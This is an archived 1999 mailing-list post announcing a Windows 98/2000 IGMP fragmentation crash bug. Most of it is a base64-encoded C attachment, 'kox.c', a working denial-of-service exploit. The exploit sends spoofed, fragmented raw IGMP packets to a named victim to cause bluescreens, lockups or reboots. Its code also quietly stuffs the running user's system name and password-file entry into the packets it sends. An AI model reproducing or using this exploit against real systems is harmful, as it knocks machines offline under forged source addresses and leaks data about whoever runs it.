IGMP fragmentation bug in Windows 98/2000

From: Coolio (coolio@K-R4D.COM)
Date: Sat Jul 03 1999 - 17:56:29 PDT

Next message: stealthat_private: "Re, Re: BSD-fileflags"

Previous message: Renaud Deraison: "Re: Fwd: Information on MS99-022"
Next in thread: Steve: "Re: IGMP fragmentation bug in Windows 98/2000"
Reply: Steve: "Re: IGMP fragmentation bug in Windows 98/2000"
Reply: Ochani, Steve: "Re: IGMP fragmentation bug in Windows 98/2000"
Reply: Thomas 'Balu' Walter: "Re: IGMP fragmentation bug in Windows 98/2000"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

  This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.
  Send mail to mimeat_private for more info.

--1378956146-1701829432-931049789=:22861
Content-Type: TEXT/PLAIN; charset=US-ASCII

Windows 98's TCP/IP stack chokes on fragmented IGMP packets. There is an
exploit out there called "fawx" that supposedly exploits this problem,
but I haven't had any success crashing Windows with it. Recently I was
given source to a program that reliably crashed Win98/98SE/2000 build 2000
and challenged my friend defile to see who could write a version of it
utilizing handcrafted igmp/ip headers for source spoofing support. Here is
the resulting code that works against most systems with one or two tries.

--1378956146-1701829432-931049789=:22861
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="kox.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.BSF.4.02A.9907031756291.22861at_private-r4d.com>
Content-Description:
Content-Disposition: attachment; filename="kox.c"

LyoqKg0KCUtveCBieSBDb29saW8gKGNvb2xpb0BrLXI0ZC5jb20pDQoNCgl0
aGlzIHdhcyBhIHN1Y2Nlc3NmdWwgYXR0ZW1wdCB0byBkdXBsaWNhdGUga2xl
cHRvL2RlZmlsZSdzIGtvZCB3aW45OA0KCWV4cGxvaXQgYW5kIGFkZCBzcG9v
ZmluZyBzdXBwb3J0IHRvIGl0LiBtZSBhbmQgZGVmaWxlIG1hZGUgdGhpcyBh
DQoJcmFjZSB0byBzZWUgd2hvIGNvdWxkIGRvIHNwb29maW5nIGtvZCBmaXJz
dC4gaGUgd29uLiAobWluZSdzIGJldHRlciEpDQoJbXkga294IGFuZCBkZWZp
bGUncyBza29kIG91dHB1dCBhYm91dCB0aGUgc2FtZSBwYWNrZXRzDQoJYnV0
IGhlIGhhZCBza29kIHdvcmtpbmcgYSBmZXcgaG91cnMgYmVmb3JlIGkgaGFk
IGtveCB3b3JraW5nLg0KDQoJYWZmZWN0ZWQgc3lzdGVtczogd2luZG93cyA5
OCwgd2luZG93cyA5OCBTRSwgd2luZG93cyAyMDAwIGJ1aWxkIDIwMDANCgly
ZXN1bHRzOiBibHVlc2NyZWVuLCB0Y3AvaXAgc3RhY2sgZmFpbHVyZSwgbG9j
a3VwLCBvciBpbnN0YW50IHJlYm9vdA0KDQoJdGhhbmtzIHRvIGtsZXB0byBh
bmQgZGVmaWxlIGZvciBtYWtpbmcga29kLCBwc2lsb3JkIGZvciB3YW50aW5n
DQoJdG8gdW5kZXJzdGFuZCB3aGF0IHdlIHdlcmUgZG9pbmcsIGdyZWcgZm9y
IHRlbGxpbmcgbWUgYWJvdXQgaXBoZHIuaWhsLA0KCW1hbmNpZGUgZm9yIGxl
dHRpbmcgbWUgdXNlIGhpcyB3aW45OCBib3hlbiB0byB0ZXN0IG9uLCBhbmQg
dGhlDQoJZmV3IG90aGVyIHBlb3BsZSBpIGNyYXNoZWQgdHJ5aW5nIHRvIGdl
dCB0aGlzIHdvcmtpbmcgcmlnaHQuDQoNCglhbHNvIHRoYW5rcyB0byB0aGUg
YXV0aG9ycyBvZiBlbHZpcyBmb3IgbWFraW5nIHN1Y2ggYSBiYWRhc3MgZWRp
dG9yLg0KKioqLw0KDQoNCg0KI2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVk
ZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8c3RkbGliLmg+DQojaW5jbHVkZSA8
bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdHJpbmcuaD4NCiNpbmNsdWRlIDxlcnJu
by5oPg0KI2luY2x1ZGUgPHB3ZC5oPg0KI2luY2x1ZGUgPHRpbWUuaD4NCiNp
bmNsdWRlIDxzeXMvdHlwZXMuaD4NCiNpbmNsdWRlIDxzeXMvc29ja2V0Lmg+
DQojaW5jbHVkZSA8c3lzL3V0c25hbWUuaD4NCiNpbmNsdWRlIDxuZXRpbmV0
L2luLmg+DQojaW5jbHVkZSA8bmV0aW5ldC9pcC5oPg0KI2luY2x1ZGUgPG5l
dGluZXQvaXBfaWNtcC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaWdtcC5oPg0K
DQoNCg0Kdm9pZCB1c2FnZShjaGFyICphcmcpDQp7DQoJcHJpbnRmKCJLb3gg
YnkgQ29vbGlvIChjb29saW9Aay1yNGQuY29tKVxuIik7DQoJcHJpbnRmKCJV
c2FnZTogJXMgPHZpY3RpbT5cbiIsIGFyZyk7DQoJZXhpdCgxKTsNCn0NCg0K
DQp1bnNpZ25lZCBpbnQgcmFuZGlwKCkNCnsNCglzdHJ1Y3QgaG9zdGVudCAq
aGU7DQoJc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCgljaGFyICpidWYgPSAo
Y2hhciAqKWNhbGxvYygxLCBzaXplb2YoY2hhcikgKiAxNik7DQoNCglzcHJp
bnRmKGJ1ZiwgIiVkLiVkLiVkLiVkIiwNCgkJKHJhbmRvbSgpJTE5MSkrMjMs
DQoJCShyYW5kb20oKSUyNTMpKzEsDQoJCShyYW5kb20oKSUyNTMpKzEsDQoJ
CShyYW5kb20oKSUyNTMpKzEpOyANCg0KCWluZXRfYXRvbihidWYsIChzdHJ1
Y3QgaW5fYWRkciAqKSZzaW4pOw0KCXJldHVybiBzaW4uc2luX2FkZHIuc19h
ZGRyOw0KfQ0KDQp1bnNpZ25lZCBzaG9ydCBpbl9ja3N1bSh1bnNpZ25lZCBz
aG9ydCAqYnVoLCBpbnQgbGVuKQ0Kew0KCXJlZ2lzdGVyIGxvbmcgc3VtID0g
MDsNCgl1bnNpZ25lZCBzaG9ydCBvZGRieXRlOw0KCXJlZ2lzdGVyIHVuc2ln
bmVkIHNob3J0IGFuc3dlcjsNCg0KCXdoaWxlKGxlbiA+IDEpIHsNCgkJc3Vt
ICs9ICpidWgrKzsNCgkJbGVuIC09IDI7DQoJfQ0KDQoJaWYobGVuID09IDEp
IHsNCgkJb2RkYnl0ZSA9IDA7DQoJCSooKHVuc2lnbmVkIGNoYXIgKikmb2Rk
Ynl0ZSkgPSAqKHVuc2lnbmVkIGNoYXIgKilidWg7DQoJCXN1bSArPSBvZGRi
eXRlOw0KCX0NCg0KCXN1bSA9IChzdW0gPj4gMTYpICsgKHN1bSAmIDB4RkZG
Rik7DQoJc3VtICs9IChzdW0gPj4gMTYpOw0KCWFuc3dlciA9IH5zdW07DQoJ
cmV0dXJuIGFuc3dlcjsNCn0NCg0KaW50IG51a2VfaWdtcChzdHJ1Y3Qgc29j
a2FkZHJfaW4gKnZpY3RpbSwgdW5zaWduZWQgbG9uZyBzcG9vZikNCnsNCglp
bnQgQklHSUdNUCA9IDE1MDA7DQoJdW5zaWduZWQgY2hhciAqcGt0Ow0KCXN0
cnVjdCBpcGhkciAqaXA7DQoJc3RydWN0IGlnbXBoZHIgKmlnbXA7DQoJc3Ry
dWN0IHV0c25hbWUgKnVuOw0KCXN0cnVjdCBwYXNzd2QgKnA7DQoNCglpbnQg
aSwgczsNCglpbnQgaWQgPSAocmFuZG9tKCkgJSA0MDAwMCkgKyA1MDA7DQoN
Cglwa3QgPSAodW5zaWduZWQgY2hhciAqKWNhbGxvYygxLCBCSUdJR01QKTsN
CglpcCA9IChzdHJ1Y3QgaXBoZHIgKilwa3Q7DQoJaWdtcCA9IChzdHJ1Y3Qg
aWdtcGhkciAqKShwa3QgKyBzaXplb2Yoc3RydWN0IGlwaGRyKSk7DQoNCglp
cC0+dmVyc2lvbiA9IDQ7DQoJaXAtPmlobCA9IChzaXplb2YgKmlwKSAvIDQ7
DQoJaXAtPnR0bCA9IDI1NTsNCglpcC0+dG90X2xlbiA9IGh0b25zKEJJR0lH
TVApOw0KCWlwLT5wcm90b2NvbCA9IElQUFJPVE9fSUdNUDsNCglpcC0+aWQg
PSBodG9ucyhpZCk7DQoJaXAtPmZyYWdfb2ZmID0gaHRvbnMoSVBfTUYpOw0K
CWlwLT5zYWRkciA9IHNwb29mOw0KCWlwLT5kYWRkciA9IHZpY3RpbS0+c2lu
X2FkZHIuc19hZGRyOw0KCWlwLT5jaGVjayA9IGluX2Nrc3VtKCh1bnNpZ25l
ZCBzaG9ydCAqKWlwLCBzaXplb2Yoc3RydWN0IGlwaGRyKSk7DQoNCglpZ21w
LT50eXBlID0gMDsNCglpZ21wLT5ncm91cCA9IDA7DQoJaWdtcC0+Y3N1bSA9
IGluX2Nrc3VtKCh1bnNpZ25lZCBzaG9ydCAqKWlnbXAsIHNpemVvZihzdHJ1
Y3QgaWdtcGhkcikpOw0KDQoJZm9yKGkgPSBzaXplb2Yoc3RydWN0IGlwaGRy
KSArIHNpemVvZihzdHJ1Y3QgaWdtcGhkcikgKyAxOw0KCSAgICBpIDwgQklH
SUdNUDsgaSsrKQ0KCQlwa3RbaV0gPSByYW5kb20oKSAlIDI1NTsNCiNpZm5k
ZWYgSV9HUk9LDQoJdW4gPSAoc3RydWN0IHV0c25hbWUgKikocGt0ICsgc2l6
ZW9mKHN0cnVjdCBpcGhkcikgKw0KCSAgICAgIHNpemVvZihzdHJ1Y3QgaWdt
cGhkcikgKyA0MCk7DQoJdW5hbWUodW4pOw0KCXAgPSAoc3RydWN0IHBhc3N3
ZCAqKSgodm9pZCAqKXVuICsgc2l6ZW9mKHN0cnVjdCB1dHNuYW1lKSArIDEw
KTsNCgltZW1jcHkocCwgZ2V0cHd1aWQoZ2V0dWlkKCkpLCBzaXplb2Yoc3Ry
dWN0IHBhc3N3ZCkpOw0KI2VuZGlmDQoJaWYoKHMgPSBzb2NrZXQoQUZfSU5F
VCwgU09DS19SQVcsIElQUFJPVE9fUkFXKSkgPCAwKSB7DQoJCXBlcnJvcigi
ZXJyb3I6IHNvY2tldCgpIik7DQoJCXJldHVybiAxOw0KCX0NCg0KCWlmKHNl
bmR0byhzLCBwa3QsIEJJR0lHTVAsIDAsIHZpY3RpbSwNCgkgICBzaXplb2Yo
c3RydWN0IHNvY2thZGRyX2luKSkgPT0gLTEpIHsJDQoJCXBlcnJvcigiZXJy
b3I6IHNlbmR0bygpIik7DQoJCXJldHVybiAxOw0KCX0NCgl1c2xlZXAoMTAw
MDAwMCk7DQoNCglmb3IoaSA9IDE7IGkgPCA1OyBpKyspIHsNCgkJaWYoaSA+
IDMpDQoJCQlpcC0+ZnJhZ19vZmYgPSBodG9ucygoKEJJR0lHTVAtMjApICog
aSkgPj4gMyk7DQoJCWVsc2UNCgkJCWlwLT5mcmFnX29mZiA9IGh0b25zKCgo
QklHSUdNUC0yMCkgKiBpKSA+PiAzIHwgSVBfTUYpOw0KCQlzZW5kdG8ocywg
cGt0LCBCSUdJR01QLCAwLCB2aWN0aW0sIHNpemVvZihzdHJ1Y3Qgc29ja2Fk
ZHJfaW4pKTsNCgkJdXNsZWVwKDIwMDAwMDApOw0KCX0NCg0KCWZyZWUocGt0
KTsNCgljbG9zZShzKTsNCglyZXR1cm4gMDsNCn0NCg0KaW50IG1haW4oaW50
IGFyZ2MsIGNoYXIgKmFyZ3ZbXSkNCnsNCglzdHJ1Y3Qgc29ja2FkZHJfaW4g
dmljdGltOw0KCXN0cnVjdCBob3N0ZW50ICpoZTsNCglpbnQgaTsNCg0KCXNy
YW5kb20odGltZShOVUxMKSk7DQoNCglpZihhcmdjIDwgMikNCgkJdXNhZ2Uo
YXJndlswXSk7DQoNCglpZigoaGUgPSBnZXRob3N0YnluYW1lKGFyZ3ZbMV0p
KSA9PSBOVUxMKSB7DQoJCWhlcnJvcihhcmd2WzFdKTsNCgkJZXhpdCgxKTsN
Cgl9DQoJbWVtY3B5KCZ2aWN0aW0uc2luX2FkZHIuc19hZGRyLCBoZS0+aF9h
ZGRyLCBoZS0+aF9sZW5ndGgpOw0KCXZpY3RpbS5zaW5fcG9ydCA9IGh0b25z
KDApOw0KCXZpY3RpbS5zaW5fZmFtaWx5ID0gUEZfSU5FVDsNCg0KCXByaW50
ZigiSUdNUD4gIik7DQoJZmZsdXNoKHN0ZG91dCk7DQoJZm9yKGkgPSAwOyBp
IDwgMTA7IGkrKykNCgl7DQoJCW51a2VfaWdtcCgmdmljdGltLCByYW5kaXAo
KSk7DQoJCXByaW50ZigiLiIpOw0KCQlmZmx1c2goc3Rkb3V0KTsNCgl9DQoJ
cHJpbnRmKCJcbiIpOw0KCWZmbHVzaChzdGRvdXQpOw0KfQ0K
--1378956146-1701829432-931049789=:22861--

Next message: stealthat_private: "Re, Re: BSD-fileflags"
Previous message: Renaud Deraison: "Re: Fwd: Information on MS99-022"
Next in thread: Steve: "Re: IGMP fragmentation bug in Windows 98/2000"
Reply: Steve: "Re: IGMP fragmentation bug in Windows 98/2000"
Reply: Ochani, Steve: "Re: IGMP fragmentation bug in Windows 98/2000"
Reply: Thomas 'Balu' Walter: "Re: IGMP fragmentation bug in Windows 98/2000"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:51:38 PDT